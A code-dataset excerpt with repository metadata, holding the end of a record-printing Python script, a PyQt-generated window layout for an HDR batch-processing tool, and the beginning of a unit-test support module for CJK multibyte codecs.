print(common.jsonpretty({'line_number': null_pair[0],
'field': null_pair[1]
}))
elif readable_dict_mode:
readable_lines = nb_reporter.filter_with_readable_output(src_file)
for line in readable_lines:
if line == first_line:
continue
record_dict = {}
value_array = line.split('|')
for r_index, field in enumerate(fields):
record_dict[field] = value_array[r_index]
print(common.jsonpretty(record_dict))
elif readable_line_mode:
proc = Dictionary2CSVProcessor(fields, "|", dmap.WhitespaceCleanupProcessor())
readable_lines = nb_reporter.filter_with_readable_output(src_file)
for line in readable_lines:
if line == first_line:
continue
record_dict = {}
value_array = line.split('|')
for r_index, field in enumerate(fields):
record_dict[field] = value_array[r_index]
proc.process(record_dict)
else:
print("Choose an option flag for record info output")
if __name__ == '__main__':
args = docopt.docopt(__doc__)
main(args)
| [
"binarymachineshop@gmail.com"
] | binarymachineshop@gmail.com |
6bd691bc3b1822dbfe4648cc8c79382b20c34e6b | d6d874fe9e1607a859e9484fdc5bce09b3f76472 | /Pipeline/the_LATEST/sys_PY/py_MODULES/hdrprocess_old/view/mainWindow.py | bbbde9578041fba60f361228ee9e0bea1b9844e0 | [] | no_license | tws0002/pop2-project | c80095cc333195ebb9ffa2199e2c3a3446d0df0c | 6886f05d54ec77b66d13b4eaafe8a66ac49f2f41 | refs/heads/master | 2021-01-11T20:53:19.982950 | 2016-03-10T10:31:29 | 2016-03-10T10:31:29 | 79,202,989 | 1 | 1 | null | 2017-01-17T07:56:09 | 2017-01-17T07:56:09 | null | UTF-8 | Python | false | false | 20,069 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/home/selecaotwo/Dropbox/Private/my_PROJECT/proj_POP2/Pipeline/the_LATEST/sys_PY/py_MODULES/hdrprocess/view/mainWindow.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
try:
import PyQt.QtCore as QtCore
import PyQt.QtGui as QtGui
except ImportError:
import PySide.QtCore as QtCore
import PySide.QtGui as QtGui
except:
raise
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(1148, 890)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.gridLayout_4 = QtGui.QGridLayout(self.centralwidget)
self.gridLayout_4.setObjectName(_fromUtf8("gridLayout_4"))
self.gridLayout = QtGui.QGridLayout()
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.line_3 = QtGui.QFrame(self.centralwidget)
self.line_3.setFrameShape(QtGui.QFrame.HLine)
self.line_3.setFrameShadow(QtGui.QFrame.Sunken)
self.line_3.setObjectName(_fromUtf8("line_3"))
self.gridLayout.addWidget(self.line_3, 8, 0, 1, 2)
spacerItem = QtGui.QSpacerItem(20, 25, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
self.gridLayout.addItem(spacerItem, 11, 0, 1, 1)
self.colorBalancing_cb = QtGui.QCheckBox(self.centralwidget)
self.colorBalancing_cb.setObjectName(_fromUtf8("colorBalancing_cb"))
self.gridLayout.addWidget(self.colorBalancing_cb, 20, 1, 1, 1)
self.title_hl = QtGui.QHBoxLayout()
self.title_hl.setObjectName(_fromUtf8("title_hl"))
self.title_l = QtGui.QLabel(self.centralwidget)
self.title_l.setMaximumSize(QtCore.QSize(16777215, 40))
font = QtGui.QFont()
font.setFamily(_fromUtf8("Droid Serif"))
font.setPointSize(18)
self.title_l.setFont(font)
self.title_l.setAlignment(QtCore.Qt.AlignBottom|QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft)
self.title_l.setObjectName(_fromUtf8("title_l"))
self.title_hl.addWidget(self.title_l)
self.version_l = QtGui.QLabel(self.centralwidget)
self.version_l.setMaximumSize(QtCore.QSize(16777215, 40))
self.version_l.setStyleSheet(_fromUtf8("margin-bottom: 2px;"))
self.version_l.setAlignment(QtCore.Qt.AlignBottom|QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft)
self.version_l.setObjectName(_fromUtf8("version_l"))
self.title_hl.addWidget(self.version_l)
self.gridLayout.addLayout(self.title_hl, 0, 0, 1, 1)
self.curveInput_hl = QtGui.QHBoxLayout()
self.curveInput_hl.setObjectName(_fromUtf8("curveInput_hl"))
self.curveInput_l = QtGui.QLabel(self.centralwidget)
self.curveInput_l.setMaximumSize(QtCore.QSize(90, 16777215))
self.curveInput_l.setObjectName(_fromUtf8("curveInput_l"))
self.curveInput_hl.addWidget(self.curveInput_l)
self.curveInput_cb = QtGui.QComboBox(self.centralwidget)
self.curveInput_cb.setObjectName(_fromUtf8("curveInput_cb"))
self.curveInput_hl.addWidget(self.curveInput_cb)
self.curveInput_tb = QtGui.QToolButton(self.centralwidget)
self.curveInput_tb.setObjectName(_fromUtf8("curveInput_tb"))
self.curveInput_hl.addWidget(self.curveInput_tb)
self.gridLayout.addLayout(self.curveInput_hl, 9, 0, 1, 2)
self.generalSettings_l = QtGui.QLabel(self.centralwidget)
font = QtGui.QFont()
font.setPointSize(14)
self.generalSettings_l.setFont(font)
self.generalSettings_l.setObjectName(_fromUtf8("generalSettings_l"))
self.gridLayout.addWidget(self.generalSettings_l, 2, 0, 1, 1)
spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Minimum)
self.gridLayout.addItem(spacerItem1, 0, 4, 1, 1)
self.line_5 = QtGui.QFrame(self.centralwidget)
self.line_5.setFrameShape(QtGui.QFrame.HLine)
self.line_5.setFrameShadow(QtGui.QFrame.Sunken)
self.line_5.setObjectName(_fromUtf8("line_5"))
self.gridLayout.addWidget(self.line_5, 23, 0, 1, 2)
self.ghostRemoval_cb = QtGui.QCheckBox(self.centralwidget)
self.ghostRemoval_cb.setObjectName(_fromUtf8("ghostRemoval_cb"))
self.gridLayout.addWidget(self.ghostRemoval_cb, 19, 1, 1, 1)
self.line_6 = QtGui.QFrame(self.centralwidget)
self.line_6.setFrameShape(QtGui.QFrame.HLine)
self.line_6.setFrameShadow(QtGui.QFrame.Sunken)
self.line_6.setObjectName(_fromUtf8("line_6"))
self.gridLayout.addWidget(self.line_6, 18, 0, 1, 2)
spacerItem2 = QtGui.QSpacerItem(20, 10, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
self.gridLayout.addItem(spacerItem2, 1, 0, 1, 1)
self.outputType_hl = QtGui.QHBoxLayout()
self.outputType_hl.setObjectName(_fromUtf8("outputType_hl"))
self.outputType_l = QtGui.QLabel(self.centralwidget)
self.outputType_l.setObjectName(_fromUtf8("outputType_l"))
self.outputType_hl.addWidget(self.outputType_l)
self.outputType_le = QtGui.QLineEdit(self.centralwidget)
self.outputType_le.setMaximumSize(QtCore.QSize(70, 16777215))
self.outputType_le.setObjectName(_fromUtf8("outputType_le"))
self.outputType_hl.addWidget(self.outputType_le)
spacerItem3 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.outputType_hl.addItem(spacerItem3)
self.gridLayout.addLayout(self.outputType_hl, 5, 0, 1, 1)
self.threads_hl = QtGui.QHBoxLayout()
self.threads_hl.setObjectName(_fromUtf8("threads_hl"))
self.threads_l = QtGui.QLabel(self.centralwidget)
self.threads_l.setObjectName(_fromUtf8("threads_l"))
self.threads_hl.addWidget(self.threads_l)
self.threads_sb = QtGui.QSpinBox(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.threads_sb.sizePolicy().hasHeightForWidth())
self.threads_sb.setSizePolicy(sizePolicy)
self.threads_sb.setMaximumSize(QtCore.QSize(50, 16777215))
self.threads_sb.setObjectName(_fromUtf8("threads_sb"))
self.threads_hl.addWidget(self.threads_sb)
spacerItem4 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.threads_hl.addItem(spacerItem4)
self.gridLayout.addLayout(self.threads_hl, 4, 0, 1, 1)
self.seqInterval_hl = QtGui.QHBoxLayout()
self.seqInterval_hl.setObjectName(_fromUtf8("seqInterval_hl"))
self.seqInterval_l = QtGui.QLabel(self.centralwidget)
self.seqInterval_l.setObjectName(_fromUtf8("seqInterval_l"))
self.seqInterval_hl.addWidget(self.seqInterval_l)
self.seqInterval_sb = QtGui.QSpinBox(self.centralwidget)
self.seqInterval_sb.setMaximumSize(QtCore.QSize(60, 16777215))
self.seqInterval_sb.setProperty("value", 0)
self.seqInterval_sb.setObjectName(_fromUtf8("seqInterval_sb"))
self.seqInterval_hl.addWidget(self.seqInterval_sb)
self.automaticSeq_cb = QtGui.QCheckBox(self.centralwidget)
self.automaticSeq_cb.setObjectName(_fromUtf8("automaticSeq_cb"))
self.seqInterval_hl.addWidget(self.automaticSeq_cb)
spacerItem5 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.seqInterval_hl.addItem(spacerItem5)
self.gridLayout.addLayout(self.seqInterval_hl, 15, 0, 1, 2)
self.outputLogger_l = QtGui.QLabel(self.centralwidget)
font = QtGui.QFont()
font.setPointSize(14)
self.outputLogger_l.setFont(font)
self.outputLogger_l.setObjectName(_fromUtf8("outputLogger_l"))
self.gridLayout.addWidget(self.outputLogger_l, 0, 5, 1, 1)
self.outputLogger_pb = QtGui.QProgressBar(self.centralwidget)
self.outputLogger_pb.setProperty("value", 24)
self.outputLogger_pb.setObjectName(_fromUtf8("outputLogger_pb"))
self.gridLayout.addWidget(self.outputLogger_pb, 0, 6, 1, 1)
spacerItem6 = QtGui.QSpacerItem(20, 25, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
self.gridLayout.addItem(spacerItem6, 16, 0, 1, 1)
spacerItem7 = QtGui.QSpacerItem(20, 25, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
self.gridLayout.addItem(spacerItem7, 6, 0, 1, 1)
self.shottingSettings_l = QtGui.QLabel(self.centralwidget)
font = QtGui.QFont()
font.setPointSize(14)
self.shottingSettings_l.setFont(font)
self.shottingSettings_l.setObjectName(_fromUtf8("shottingSettings_l"))
self.gridLayout.addWidget(self.shottingSettings_l, 12, 0, 1, 1)
self.mergeSettings_l = QtGui.QLabel(self.centralwidget)
font = QtGui.QFont()
font.setPointSize(14)
self.mergeSettings_l.setFont(font)
self.mergeSettings_l.setObjectName(_fromUtf8("mergeSettings_l"))
self.gridLayout.addWidget(self.mergeSettings_l, 17, 0, 1, 1)
spacerItem8 = QtGui.QSpacerItem(20, 20, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
self.gridLayout.addItem(spacerItem8, 28, 6, 1, 1)
spacerItem9 = QtGui.QSpacerItem(21, 30, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
self.gridLayout.addItem(spacerItem9, 29, 0, 1, 7)
self.curveSettings_l = QtGui.QLabel(self.centralwidget)
font = QtGui.QFont()
font.setPointSize(14)
self.curveSettings_l.setFont(font)
self.curveSettings_l.setObjectName(_fromUtf8("curveSettings_l"))
self.gridLayout.addWidget(self.curveSettings_l, 7, 0, 1, 1)
self.miscSettings_l = QtGui.QLabel(self.centralwidget)
font = QtGui.QFont()
font.setPointSize(14)
self.miscSettings_l.setFont(font)
self.miscSettings_l.setObjectName(_fromUtf8("miscSettings_l"))
self.gridLayout.addWidget(self.miscSettings_l, 22, 0, 1, 1)
self.exposureCorrection_cb = QtGui.QCheckBox(self.centralwidget)
self.exposureCorrection_cb.setObjectName(_fromUtf8("exposureCorrection_cb"))
self.gridLayout.addWidget(self.exposureCorrection_cb, 20, 0, 1, 1)
self.use32bitIEE_cb = QtGui.QCheckBox(self.centralwidget)
self.use32bitIEE_cb.setChecked(False)
self.use32bitIEE_cb.setObjectName(_fromUtf8("use32bitIEE_cb"))
self.gridLayout.addWidget(self.use32bitIEE_cb, 24, 1, 1, 1)
self.line_4 = QtGui.QFrame(self.centralwidget)
self.line_4.setFrameShape(QtGui.QFrame.HLine)
self.line_4.setFrameShadow(QtGui.QFrame.Sunken)
self.line_4.setObjectName(_fromUtf8("line_4"))
self.gridLayout.addWidget(self.line_4, 13, 0, 1, 2)
self.estimateCurve_cb = QtGui.QCheckBox(self.centralwidget)
self.estimateCurve_cb.setObjectName(_fromUtf8("estimateCurve_cb"))
self.gridLayout.addWidget(self.estimateCurve_cb, 10, 1, 1, 1)
self.line_2 = QtGui.QFrame(self.centralwidget)
self.line_2.setFrameShape(QtGui.QFrame.HLine)
self.line_2.setFrameShadow(QtGui.QFrame.Sunken)
self.line_2.setObjectName(_fromUtf8("line_2"))
self.gridLayout.addWidget(self.line_2, 3, 0, 1, 2)
self.imageAlignment_cb = QtGui.QCheckBox(self.centralwidget)
self.imageAlignment_cb.setObjectName(_fromUtf8("imageAlignment_cb"))
self.gridLayout.addWidget(self.imageAlignment_cb, 19, 0, 1, 1)
self.okCancel_bb = QtGui.QDialogButtonBox(self.centralwidget)
self.okCancel_bb.setStandardButtons(QtGui.QDialogButtonBox.Cancel|QtGui.QDialogButtonBox.Ok)
self.okCancel_bb.setObjectName(_fromUtf8("okCancel_bb"))
self.gridLayout.addWidget(self.okCancel_bb, 31, 6, 1, 1)
spacerItem10 = QtGui.QSpacerItem(20, 20, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
self.gridLayout.addItem(spacerItem10, 30, 6, 1, 1)
self.autoRenameFiles_cb = QtGui.QCheckBox(self.centralwidget)
self.autoRenameFiles_cb.setObjectName(_fromUtf8("autoRenameFiles_cb"))
self.gridLayout.addWidget(self.autoRenameFiles_cb, 5, 1, 1, 1)
self.defaultCurve_cb = QtGui.QCheckBox(self.centralwidget)
self.defaultCurve_cb.setObjectName(_fromUtf8("defaultCurve_cb"))
self.gridLayout.addWidget(self.defaultCurve_cb, 10, 0, 1, 1)
self.outputLogger_te = QtGui.QTextEdit(self.centralwidget)
self.outputLogger_te.setMinimumSize(QtCore.QSize(530, 0))
self.outputLogger_te.setStyleSheet(_fromUtf8("background-color: #cccccc;"))
self.outputLogger_te.setObjectName(_fromUtf8("outputLogger_te"))
self.gridLayout.addWidget(self.outputLogger_te, 1, 5, 27, 2)
self.ignoreMissingExposures_cb = QtGui.QCheckBox(self.centralwidget)
self.ignoreMissingExposures_cb.setObjectName(_fromUtf8("ignoreMissingExposures_cb"))
self.gridLayout.addWidget(self.ignoreMissingExposures_cb, 24, 0, 1, 1)
self.recursiveSearch_cb = QtGui.QCheckBox(self.centralwidget)
self.recursiveSearch_cb.setObjectName(_fromUtf8("recursiveSearch_cb"))
self.gridLayout.addWidget(self.recursiveSearch_cb, 4, 1, 1, 1)
spacerItem11 = QtGui.QSpacerItem(20, 25, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
self.gridLayout.addItem(spacerItem11, 21, 0, 1, 1)
self.fnum_hl = QtGui.QHBoxLayout()
self.fnum_hl.setObjectName(_fromUtf8("fnum_hl"))
self.fnum_l = QtGui.QLabel(self.centralwidget)
self.fnum_l.setObjectName(_fromUtf8("fnum_l"))
self.fnum_hl.addWidget(self.fnum_l)
self.fnum_sw = QtGui.QStackedWidget(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.fnum_sw.sizePolicy().hasHeightForWidth())
self.fnum_sw.setSizePolicy(sizePolicy)
self.fnum_sw.setMaximumSize(QtCore.QSize(80, 16777215))
self.fnum_sw.setObjectName(_fromUtf8("fnum_sw"))
self.fnum_cb_p = QtGui.QWidget()
self.fnum_cb_p.setObjectName(_fromUtf8("fnum_cb_p"))
self.gridLayout_3 = QtGui.QGridLayout(self.fnum_cb_p)
self.gridLayout_3.setObjectName(_fromUtf8("gridLayout_3"))
self.fnum_cb = QtGui.QComboBox(self.fnum_cb_p)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.fnum_cb.sizePolicy().hasHeightForWidth())
self.fnum_cb.setSizePolicy(sizePolicy)
self.fnum_cb.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.fnum_cb.setObjectName(_fromUtf8("fnum_cb"))
self.gridLayout_3.addWidget(self.fnum_cb, 0, 0, 1, 1)
self.fnum_sw.addWidget(self.fnum_cb_p)
self.fnum_le_p = QtGui.QWidget()
self.fnum_le_p.setObjectName(_fromUtf8("fnum_le_p"))
self.gridLayout_2 = QtGui.QGridLayout(self.fnum_le_p)
self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
self.fnum_le = QtGui.QLineEdit(self.fnum_le_p)
self.fnum_le.setObjectName(_fromUtf8("fnum_le"))
self.gridLayout_2.addWidget(self.fnum_le, 0, 0, 1, 1)
self.fnum_sw.addWidget(self.fnum_le_p)
self.fnum_hl.addWidget(self.fnum_sw)
self.manual_fnum_cb = QtGui.QCheckBox(self.centralwidget)
self.manual_fnum_cb.setObjectName(_fromUtf8("manual_fnum_cb"))
self.fnum_hl.addWidget(self.manual_fnum_cb)
spacerItem12 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.fnum_hl.addItem(spacerItem12)
self.gridLayout.addLayout(self.fnum_hl, 14, 0, 1, 2)
self.gridLayout_4.addLayout(self.gridLayout, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1148, 25))
self.menubar.setObjectName(_fromUtf8("menubar"))
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
self.fnum_sw.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow", None))
self.colorBalancing_cb.setText(_translate("MainWindow", "Color Balancing", None))
self.title_l.setText(_translate("MainWindow", "HDR Batch Processor", None))
self.version_l.setText(_translate("MainWindow", "v 1.2.0", None))
self.curveInput_l.setText(_translate("MainWindow", "Curve Input", None))
self.curveInput_tb.setText(_translate("MainWindow", "...", None))
self.generalSettings_l.setText(_translate("MainWindow", "General", None))
self.ghostRemoval_cb.setText(_translate("MainWindow", "Ghost Removal", None))
self.outputType_l.setText(_translate("MainWindow", "Output Type", None))
self.threads_l.setText(_translate("MainWindow", "Number of Threads", None))
self.seqInterval_l.setText(_translate("MainWindow", "Sequence Interval", None))
self.automaticSeq_cb.setText(_translate("MainWindow", "Automatic", None))
self.outputLogger_l.setText(_translate("MainWindow", "Output Logger", None))
self.shottingSettings_l.setText(_translate("MainWindow", "Shooting Settings", None))
self.mergeSettings_l.setText(_translate("MainWindow", "Merge Settings", None))
self.curveSettings_l.setText(_translate("MainWindow", "Curve Settings", None))
self.miscSettings_l.setText(_translate("MainWindow", "Misc Settings", None))
self.exposureCorrection_cb.setText(_translate("MainWindow", "Exposure Correction", None))
self.use32bitIEE_cb.setText(_translate("MainWindow", "Use 32-bit-float IEEE for TIFFs", None))
self.estimateCurve_cb.setText(_translate("MainWindow", "Estimate Curve only", None))
self.imageAlignment_cb.setText(_translate("MainWindow", "Image Alignment", None))
self.autoRenameFiles_cb.setText(_translate("MainWindow", "auto-rename files", None))
self.defaultCurve_cb.setText(_translate("MainWindow", "Default Curve", None))
self.outputLogger_te.setHtml(_translate("MainWindow", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>", None))
self.ignoreMissingExposures_cb.setText(_translate("MainWindow", "Ignore Missing Exposure Values", None))
self.recursiveSearch_cb.setText(_translate("MainWindow", "recursive search", None))
self.fnum_l.setText(_translate("MainWindow", "F-Number", None))
self.manual_fnum_cb.setText(_translate("MainWindow", "Manual", None))
| [
"colinvfx@gmail.com"
] | colinvfx@gmail.com |
417d45c85e9605ae85af1136b0377cb8910c06d5 | c8b541ea4fa7d159b80bef116e5cd232ac61b8c1 | /venv/Lib/test/multibytecodec_support.py | 2fed0b7c2ee8c31dc4890ee7dbd94ec0772518b4 | [] | no_license | shengmenghui/knowledge_building | 7a2d8eef040c2d3a45726b3a908be301e922024b | 04fd7784f15535efed917cce44856526f1f0ce48 | refs/heads/master | 2022-12-31T14:18:05.282092 | 2020-10-23T02:51:37 | 2020-10-23T02:51:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,786 | py | #
# multibytecodec_support.py
# Common Unittest Routines for CJK codecs
#
import codecs
import os
import re
import sys
import unittest
from http.client import HTTPException
from sql_mode import support
from io import BytesIO
class TestBase:
encoding = '' # codec name
codec = None # codec tuple (with 4 elements)
tstring = None # must set. 2 strings to test StreamReader
codectests = None # must set. codec test tuple
roundtriptest = 1 # set if roundtrip is possible with unicode
has_iso10646 = 0 # set if this encoding contains whole iso10646 map
xmlcharnametest = None # string to test xmlcharrefreplace
unmappedunicode = '\udeee' # a unicode code point that is not mapped.
def setUp(self):
if self.codec is None:
self.codec = codecs.lookup(self.encoding)
self.encode = self.codec.encode
self.decode = self.codec.decode
self.reader = self.codec.streamreader
self.writer = self.codec.streamwriter
self.incrementalencoder = self.codec.incrementalencoder
self.incrementaldecoder = self.codec.incrementaldecoder
def test_chunkcoding(self):
tstring_lines = []
for b in self.tstring:
lines = b.split(b"\n")
last = lines.pop()
assert last == b""
lines = [line + b"\n" for line in lines]
tstring_lines.append(lines)
for native, utf8 in zip(*tstring_lines):
u = self.decode(native)[0]
self.assertEqual(u, utf8.decode('utf-8'))
if self.roundtriptest:
self.assertEqual(native, self.encode(u)[0])
def test_errorhandle(self):
for source, scheme, expected in self.codectests:
if isinstance(source, bytes):
func = self.decode
else:
func = self.encode
if expected:
result = func(source, scheme)[0]
if func is self.decode:
self.assertTrue(type(result) is str, type(result))
self.assertEqual(result, expected,
'%a.decode(%r, %r)=%a != %a'
% (source, self.encoding, scheme, result,
expected))
else:
self.assertTrue(type(result) is bytes, type(result))
self.assertEqual(result, expected,
'%a.encode(%r, %r)=%a != %a'
% (source, self.encoding, scheme, result,
expected))
else:
self.assertRaises(UnicodeError, func, source, scheme)
def test_xmlcharrefreplace(self):
if self.has_iso10646:
self.skipTest('encoding contains full ISO 10646 map')
s = "\u0b13\u0b23\u0b60 nd eggs"
self.assertEqual(
self.encode(s, "xmlcharrefreplace")[0],
b"ଓଣୠ nd eggs"
)
def test_customreplace_encode(self):
if self.has_iso10646:
self.skipTest('encoding contains full ISO 10646 map')
from html.entities import codepoint2name
def xmlcharnamereplace(exc):
if not isinstance(exc, UnicodeEncodeError):
raise TypeError("don't know how to handle %r" % exc)
l = []
for c in exc.object[exc.start:exc.end]:
if ord(c) in codepoint2name:
l.append("&%s;" % codepoint2name[ord(c)])
else:
l.append("&#%d;" % ord(c))
return ("".join(l), exc.end)
codecs.register_error("test.xmlcharnamereplace", xmlcharnamereplace)
if self.xmlcharnametest:
sin, sout = self.xmlcharnametest
else:
sin = "\xab\u211c\xbb = \u2329\u1234\u232a"
sout = b"«ℜ» = ⟨ሴ⟩"
self.assertEqual(self.encode(sin,
"test.xmlcharnamereplace")[0], sout)
def test_callback_returns_bytes(self):
def myreplace(exc):
return (b"1234", exc.end)
codecs.register_error("test.cjktest", myreplace)
enc = self.encode("abc" + self.unmappedunicode + "def", "test.cjktest")[0]
self.assertEqual(enc, b"abc1234def")
def test_callback_wrong_objects(self):
def myreplace(exc):
return (ret, exc.end)
codecs.register_error("test.cjktest", myreplace)
for ret in ([1, 2, 3], [], None, object()):
self.assertRaises(TypeError, self.encode, self.unmappedunicode,
'test.cjktest')
def test_callback_long_index(self):
def myreplace(exc):
return ('x', int(exc.end))
codecs.register_error("test.cjktest", myreplace)
self.assertEqual(self.encode('abcd' + self.unmappedunicode + 'efgh',
'test.cjktest'), (b'abcdxefgh', 9))
def myreplace(exc):
return ('x', sys.maxsize + 1)
codecs.register_error("test.cjktest", myreplace)
self.assertRaises(IndexError, self.encode, self.unmappedunicode,
'test.cjktest')
def test_callback_None_index(self):
def myreplace(exc):
return ('x', None)
codecs.register_error("test.cjktest", myreplace)
self.assertRaises(TypeError, self.encode, self.unmappedunicode,
'test.cjktest')
def test_callback_backward_index(self):
def myreplace(exc):
if myreplace.limit > 0:
myreplace.limit -= 1
return ('REPLACED', 0)
else:
return ('TERMINAL', exc.end)
myreplace.limit = 3
codecs.register_error("test.cjktest", myreplace)
self.assertEqual(self.encode('abcd' + self.unmappedunicode + 'efgh',
'test.cjktest'),
(b'abcdREPLACEDabcdREPLACEDabcdREPLACEDabcdTERMINALefgh', 9))
def test_callback_forward_index(self):
def myreplace(exc):
return ('REPLACED', exc.end + 2)
codecs.register_error("test.cjktest", myreplace)
self.assertEqual(self.encode('abcd' + self.unmappedunicode + 'efgh',
'test.cjktest'), (b'abcdREPLACEDgh', 9))
def test_callback_index_outofbound(self):
def myreplace(exc):
return ('TERM', 100)
codecs.register_error("test.cjktest", myreplace)
self.assertRaises(IndexError, self.encode, self.unmappedunicode,
'test.cjktest')
def test_incrementalencoder(self):
UTF8Reader = codecs.getreader('utf-8')
for sizehint in [None] + list(range(1, 33)) + \
[64, 128, 256, 512, 1024]:
istream = UTF8Reader(BytesIO(self.tstring[1]))
ostream = BytesIO()
encoder = self.incrementalencoder()
while 1:
if sizehint is not None:
data = istream.read(sizehint)
else:
data = istream.read()
if not data:
break
e = encoder.encode(data)
ostream.write(e)
self.assertEqual(ostream.getvalue(), self.tstring[0])
def test_incrementaldecoder(self):
UTF8Writer = codecs.getwriter('utf-8')
for sizehint in [None, -1] + list(range(1, 33)) + \
[64, 128, 256, 512, 1024]:
istream = BytesIO(self.tstring[0])
ostream = UTF8Writer(BytesIO())
decoder = self.incrementaldecoder()
while 1:
data = istream.read(sizehint)
if not data:
break
else:
u = decoder.decode(data)
ostream.write(u)
self.assertEqual(ostream.getvalue(), self.tstring[1])
def test_incrementalencoder_error_callback(self):
inv = self.unmappedunicode
e = self.incrementalencoder()
self.assertRaises(UnicodeEncodeError, e.encode, inv, True)
e.errors = 'ignore'
self.assertEqual(e.encode(inv, True), b'')
e.reset()
def tempreplace(exc):
return ('called', exc.end)
codecs.register_error('test.incremental_error_callback', tempreplace)
e.errors = 'test.incremental_error_callback'
self.assertEqual(e.encode(inv, True), b'called')
# again
e.errors = 'ignore'
self.assertEqual(e.encode(inv, True), b'')
def test_streamreader(self):
UTF8Writer = codecs.getwriter('utf-8')
for name in ["read", "readline", "readlines"]:
for sizehint in [None, -1] + list(range(1, 33)) + \
[64, 128, 256, 512, 1024]:
istream = self.reader(BytesIO(self.tstring[0]))
ostream = UTF8Writer(BytesIO())
func = getattr(istream, name)
while 1:
data = func(sizehint)
if not data:
break
if name == "readlines":
ostream.writelines(data)
else:
ostream.write(data)
self.assertEqual(ostream.getvalue(), self.tstring[1])
def test_streamwriter(self):
readfuncs = ('read', 'readline', 'readlines')
UTF8Reader = codecs.getreader('utf-8')
for name in readfuncs:
for sizehint in [None] + list(range(1, 33)) + \
[64, 128, 256, 512, 1024]:
istream = UTF8Reader(BytesIO(self.tstring[1]))
ostream = self.writer(BytesIO())
func = getattr(istream, name)
while 1:
if sizehint is not None:
data = func(sizehint)
else:
data = func()
if not data:
break
if name == "readlines":
ostream.writelines(data)
else:
ostream.write(data)
self.assertEqual(ostream.getvalue(), self.tstring[0])
def test_streamwriter_reset_no_pending(self):
# Issue #23247: Calling reset() on a fresh StreamWriter instance
# (without pending data) must not crash
stream = BytesIO()
writer = self.writer(stream)
writer.reset()
class TestBase_Mapping(unittest.TestCase):
pass_enctest = []
pass_dectest = []
supmaps = []
codectests = []
def setUp(self):
try:
self.open_mapping_file().close() # test it to report the error early
except (OSError, HTTPException):
self.skipTest("Could not retrieve "+self.mapfileurl)
def open_mapping_file(self):
return support.open_urlresource(self.mapfileurl)
def test_mapping_file(self):
if self.mapfileurl.endswith('.xml'):
self._test_mapping_file_ucm()
else:
self._test_mapping_file_plain()
def _test_mapping_file_plain(self):
unichrs = lambda s: ''.join(map(chr, map(eval, s.split('+'))))
urt_wa = {}
with self.open_mapping_file() as f:
for line in f:
if not line:
break
data = line.split('#')[0].strip().split()
if len(data) != 2:
continue
csetval = eval(data[0])
if csetval <= 0x7F:
csetch = bytes([csetval & 0xff])
elif csetval >= 0x1000000:
csetch = bytes([(csetval >> 24), ((csetval >> 16) & 0xff),
((csetval >> 8) & 0xff), (csetval & 0xff)])
